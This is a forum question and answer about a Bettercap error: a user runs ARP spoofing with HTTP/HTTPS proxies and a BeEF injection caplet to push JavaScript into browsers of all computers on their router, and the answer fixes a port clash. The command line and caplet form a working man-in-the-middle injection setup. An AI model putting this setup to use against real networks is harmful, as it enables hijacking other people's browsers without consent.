# Bettercap: bind: address already in use

Tags: mitmproxy, .net-security

Whatever port I try to use I keep getting the error:

> listen tcp 0.0.0.0:PORT_NUMBER: bind: address already in use

#### Environment

- I also installed this using Brew if you need to know that

  - Bettercap 2.11.1
  - Mac OS High-Sierra
  - golang 1.11.4

#### Command line code used:

`sudo bettercap -eval "set net.probe off; set arp.spoof.targets 0.0.0.0" -caplet beef-active.cap`

#### beef-active.cap:

```
set http.proxy.script beef-inject.js
set http.proxy.port 8011
set https.proxy.port 8011
http.proxy on
https.proxy on
sleep 1
arp.spoof on
```

#### Expected behavior:

I am trying to inject some js into the browser of each computer connected to my router. I except to see a message that the beef-inject was successfully injected

#### Actual behavior: What actually happened

Stops when it hits my IP address. Here is the output:

> [13:26:41] [sys.log] [inf] http.proxy started on 0.0.0.0:8011 (sslstrip disabled)
>
> [13:26:41] [sys.log] [inf] loading proxy certification authority TLS key from /var/root/.bettercap-ca.key.pem
>
> [13:26:41] [sys.log] [inf] loading proxy certification authority TLS certificate from /var/root/.bettercap-ca.cert.pem
>
> [13:26:41] [sys.log] [inf] Enabling forwarding.
>
> [13:26:41] [sys.log] [inf] https.proxy started on 0.0.0.0:8011 (sslstrip disabled)
>
> [13:26:41] [sys.log] [!!!] listen tcp 0.0.0.0:8011: bind: address already in use

## edit:

Changing the ports for both to be different stopped the error however it is still not injecting anything into the browsers. All I keep getting in the console is:

ok so I changed that and I am no longer getting that error however, it is still not injecting any JS into the browsers. I just keep getting new and lost endpoints like so:

```
0.0.0.0/24 > 0.0.0.0  » [08:33:17] [endpoint.new] endpoint 0.0.0.0 detected as 04:18:d6:d0:69:e7 (Apple, Inc.).
0.0.0.0/24 > 0.0.0.0  » [08:33:23] [endpoint.lost] endpoint 0.0.0.0 (Apple, Inc.) lost.
```

.... Then it keeps ticking through the same messages, new > lost > new > lost

Any ideas?

Answer (score 1):

```
set http.proxy.port 8011
set https.proxy.port 8011
```

Those ports are set to the same thing, which means they're both trying to listen on 8011 and are stomping on each other.

Change one of them to a different port and the error should go away.

Cheers!